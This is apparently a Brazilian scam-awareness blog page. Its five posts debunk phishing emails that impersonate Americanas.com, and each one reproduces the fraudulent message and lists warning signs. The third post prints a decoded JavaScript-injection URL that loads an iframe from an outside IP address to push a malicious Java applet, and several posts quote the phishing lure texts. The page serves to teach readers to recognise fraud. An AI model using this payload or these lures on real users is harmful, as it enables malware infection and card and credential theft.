• Segurança

    Iphone 5, Smart Tv Led 47, Galaxy S4 e S3 – Tudo com preços Imperdíveis

    Preços imperdíveis e mentirosos, claro. Essa mensagem chega em seu e-mail simulando um e-mail marketing da Americanas.com, empresa do Grupo B2W que envia vários e-mails durante a semana (muitas vezes, 2 por dia). Por conta disso, é muito fácil se confundir e clicar displicentemente nessa armadilha.

    O e-mail em questão não te leva para o download de um trojan ou outro malware ladrão de bancos. Esse utiliza o elo mais fraco da corrente: o usuário. Em uma página que simula o site da Americanas.com, são apresentados os produtos – com os dados e especificações reais – e seus preços fantasiosos. Ao clicar em comprar, o usuário é direcionado para uma página onde precisa inserir seus dados pessoais, endereço, CPF, número de cartão de crédito, tudo. Tudo que o pilantra precisa para fazer compras via Internet com o SEU cartão.

    Scam Americanas iPhone 5

    Seu iPhone nunca vai chegar, meu amigo, mas aquela fatura com compras que você não fez, certamente baterá em sua porta mais rápido que o tempo que leva para você se dar conta.

    Como se proteger em casos assim?

    1. Sempre, mas SEMPRE mesmo, desconfie de ofertas maravilhosas, seja para ganhar dinheiro fácil na web ou comprar coisas com incríveis descontos, que você não encontra nem no xing-ling da esquina;
    2. Sempre, mas SEMPRE mesmo, confira o link antes de clicar. Nesse e-mail ficou bem óbvio que não se tratava de uma mensagem original, pois o link era um endereço de IP, ao invés de um site na Internet;
    3. Nunca, mas NUNCA mesmo, forneça seus dados pessoais em um site que não possua criptografia. Para conferir, basta checar que o endereço do site começa com HTTPS (esse S a mais é de Seguro), verificar o cadeado presente ao lado da barra de endereços ou no rodapé do seu navegador e se não está aparecendo um erro qualquer nesses dois locais;
    4. A última dica é mais óbvia mas nem todo mundo entende. O site em questão precisa aparecer PRIMEIRO no endereço. Nesse exemplo do golpe, o site que aparece primeiro no endereço (logo após o http://) é zonasegura.zapto.org – e definitivamente, apesar do nome, não é NADA segura essa zona, e muito menos pertence às Americanas.

    Mensagem original “Iphone 5, Smart Tv Led 47′, Galaxy S4 e S3 – Tudo com preços Imperdíveis”

    Scam Americanas

  • Segurança

    Americanas.com – Voce foi sorteado

    A mensagem abaixo chegou por e-mail e foi muito esperta em vários pontos, tentando me convencer de que eu tinha realmente sido sorteado pelo site Americanas.com a ganhar uma TV de 42″ (um dos meus objetos de desejo), mas foi uma prima pobre e mal copiada de uma outra muito bem elaborada que já falamos aqui. E claro, os scammers sempre caem em algum erro e dá pra sacar a safadeza.

    1. Eu sou cliente do site, já comprei lá e tenho cadastro. Mas e quem não é? Você já comprou alguma coisa no site das Americanas.com? Se considera um comprador compulsivo? Sim, porque o site não iria selecionar alguém que comprou apenas um livro ou um cd com um ano de cadastro, não acha? É uma promoção, não rasgar dinheiro. Se não é cliente, nunca comprou, já descarte de primeira.
    2. Ah, ok, você é cliente cadastrado, compra regularmente e se acha elegível para ganhar uma TV. Notou que na mensagem não citaram seu nome? Até mesmo o seu e-mail está oculto!? Será que essa mensagem foi mesmo pra você? Acha que uma empresa como essa enviaria um e-mail tão importante assim, de forma que pudessa cair no anti-spam tão fácil? NOT!
    3. E será que foi mesmo o site que te enviou a mensagem? Já viu o remetente? clienteespecial@quatrocantos.com. O mais engraçado é que o tal site Quatro Cantos é famoso por ter uma seção parecida com o Balela.info, que indica scams. Curioso, não?
    4. Use a dica (curiosa, por sinal) constante no próprio e-mail: “Sempre confira se o link é para o site verdadeiro da Americanas.com“. Então, o link, né? NÃO É! Ao clicar você é direcionado para http://www.whoopzhookz.com/americanas.com/promocoes/ClienteEspecial/ e é solicitado o download de um arquivo Formulario.Americanas.exe. Um executável do Windows, contendo software malicioso e muito provavelmente um trojan.

    Mensagem original (screenshot)

    Balela das Americanas.com

    Mensagem original (texto)

    Você está entre os 10 e-mails sorteados da Promoção Cliente Especial.
    TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

    Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

    ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

    Sempre confira se o link é para o site verdadeiro da Americanas.com
    Nunca informe sua senha para terceiros.

    Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.
    Ap?s clicar,ser? exibida uma caixa de download,que ? o formul?rio para o cadastro,para visualiza-lo clique em Abrir/Executar.

    Mensagem recebida por e-mail em 26/08/2008

  • Segurança

    AMERICANAS.COM – Voce foi sorteado!

    Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.

    Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

    1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
    2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
    3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:

      http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML='<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

    4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

    Mensagem original (screenshot)

    Flickr: Americanas.com Você foi Sorteado

    Tela que simula o site Americanas.com (screenshot)

    Flickr: Americanas.com Você foi Sorteado

    Mensagem original (texto)

    Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

    Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

    ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

    Sempre confira se o link é para o site verdadeiro da Americanas.com

    Nunca informe sua senha para terceiros.

    Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

    Mensagem recebida por e-mail em 16/04/2008

  • Segurança

    Setor financeiro americanas: relatorio de debito

    Emails que simulam sites ou serviços verdadeiros aproveitam-se da sua credibilidade junto ao internauta para ludibriá-lo. Sabendo disso, a maior parte das empresas restringe a comunicação com seus clientes e traz regras claras para que eles não se enganem quanto à origem de uma mensagem. O internauta, por outro lado, deve fazer a sua parte e agir com cautela.

    No exemplo abaixo, o comunicado supostamente enviado pelas Lojas Americanas contém várias pistas que denunciam sua falsidade:

    • As Lojas Americanas não enviariam um email com dois erros de português logo no título e a ausência de letra maiúscula em “Americanas”. Há vários outros ao longo do texto, muito mal escrito.
    • O destinatário não é você, mas um nome genérico: “gnu.groups”.
    • Logo no início, a imagem apresenta um “Recebemos seu pedido” típico da loja, mas o corpo do email trata de assunto diverso. Os artistas não conseguiram fazer uma imagem convincente para “Pagamento recusado”, ou coisa que o valesse?
    • Alega-se a existência de compras “no seu CPF” – se fosse válido, o email indicaria o seu CPF, leitor, com todos os números.
    • Menciona-se uma vaga “instituição financeira”, sem dar nome aos bois.
    • Rapidinho, vem a solicitação: “faça o download”. Leia-se: infecte seu computador.
    • E, claro, a intimidação: se você não fizer o que dizemos, seu nome pode ir para o SPC ou SERASA.
    • “A forma de pagamento escolhida foi: Transferência bancária”. As Americanas não aceitam pagamento nessa modalidade.
    • Os links para as Americanas são legítimos, mas os links em “Visualizar extrato de débito“, “clique aqui” e “fale conosco” apontam para um arquivo do tipo .scr – disseminador de vírus e trojan.
    • O email do remetente parece legítimo – atendimento@americanas.com.br. Acontece que o email usado pela loja é email@americanas.com. “Ah, mas eu não tenho obrigação de saber disso”, você diz. Não mesmo, mas uma simples visita aos Tópicos Freqüentes, no site das Americanas, daria essa informação, e outras:

    A Americanas.com não utiliza comunicação por spam e é contra essa prática. Os e-mails da empresa têm link direto para o site da Americanas.com ou para sites parceiros, e não possuem arquivos executáveis ou links para download.

    Os e-mails promocionais da Americanas.com têm como único remetente o endereço email@americanas.com.

    Caso desconfie da procedência de um e-mail, por favor, entre em contato conosco, acessando um de nossos canais de atendimento, informados na página inicial da CENTRAL DE ATENDIMENTO.

    Como você vê, só cai nessa balela quem quiser.

    Mensagem Original “Setor financeiro americanas: relatorio de debito”

    Setor financeiro americanas: relatorio de debito

    Mensagem texto “Setor financeiro americanas: relatorio de debito”

    De: atendimento@americanas.com.br
    Assunto: Setor financeiro americanas: relatorio de debito
    Data: 9 de dezembro de 2007 20h29min50s GMT-02:00

    Comunicamos que consta em nossos computadores o débito de R$1.996,90 feita com seu CPF , na qual a instituição financeira estornou os pagamentos alegando se tratar de transações fraudulentas.
    ATENÇÃO! Faça o download do extrato para verificar detalhes sobre os seus débitos com as americanas.com. Após a verificação do extrato, caso não reconheça as compras efetuadas assim como dados da entrega dos pedidos, favor entrar em contato com 4004-3824 ou 0xx11 2195-3824 para que possamos alertar as autoridades sobre o ocorrido , e assim, também, não incluir seu nome no SPC e SERASA .

    Visualizar extrato de débito

    A forma de pagamento escolhida foi:
    Transferência bancária – Valor R$ 1.996.90

    Visualizar extrato de débito

    • Pedimos a vossa atenção a este comunicado, pois, medidas legais serão adotadas, tais como a inclusão em nosso Sistema de Proteção ao Crédito e Bloqueio no Cadastro Nacional de Pessoa Física, bem como no Cadastro Nacional de Pessoa Jurídica.
    • a partir deste momento, não é possível a devolução de itens.
    • clique aqui para obter mais informações sobre sua compra.
    • Se desejar mais informações sobre o processo de compras na Americanas.com, clique aqui .
    • Caso reste alguma dúvida, acesse o fale conosco.

    Mensagem recebida em 18 de dezembro de 2007.

    * Colaborou: Lucia Freitas.

  • Internet

    Pedidos confirmados – Scam da Americanas.com

    Esse além de tudo é mal feito. O scammer nem se deu ao trabalho de fazer um e-mail um pouco mais elaborado, dimensionar as imagens decentemente, diagramar melhor, nada. A mensagem abaixo diz ser uma confirmação de pedido da loja virtual Americanas.com (veja uma similar do Submarino.com). Como sempre, deixas para identificar a balela:

    • Mal feito. Porcamente, por sinal. Se um site do porte do Americanas.com me manda um e-mail como esse, sem detalhes, mal diagramado, com imagens de baixa qualidade, eu repenso sobre a continuidade do processo. Imagina como chegaria a minha encomenda? Tá na cara que isso não veio do Americanas.com, você não acha?
    • Erros de português são notória presença em scams. E ainda tem gente que tem a audácia de chamar essas pessoas de hackers! Gente, hackers são especialistas, inteligentes, feras, além de não serem criminosos. Esses aí estão mais para mobral.
    • Nenhum dado de identificação do destinatário da mensagem. Come on! Você faz uma compra em um site e recebe um e-mail sequer contendo o seu nome? Se acreditar nisso, tá ferrado!
    • Outro fator importantíssimo! A continha de sua “compra” será debitada em sua conta corrente, como? Você não forneceu seus dados em lugar algum, não inseriu sua senha, não autorizou por telefone, muito menos foi ao banco assinar um termo de débito automático. Vai ser de que forma, milagre?
    • Ahhh o principal! Os links! Sério, muita gente clica sem ver e cai num endereço totalmente estranho (nada relacionado com americanas.com) e ainda autoriza a instalação do arquivo solicitado (obviamente um trojan que vai roubar suas senhas bancárias).

    Mensagem original “Pedidos confirmados Americanas.com”

    Pedidos Confirmados Americanas

    Mensagem texto “Pedidos confirmados Americanas.com”

    Prezado(a) Cliente,

    Recebemos seu pedido
    sua compra será debitada em sua conta bancária,
    dentro de 24 horas.

    CLIQUI AQUI PARA VER SEU PEDIDO OU CANCELAR !!

    VEJA O RESUMO DO SEU PEDIDO.

    Desde já agradecemos pela sua prefencia.

    Silvia Lira-Atendimento a Clientes
    Sac.atendimento@americanas.com
    www.americanas.com.br

    Mensagem original recebida em 28/06/2007

    * Colaborou: Lúcia Freitas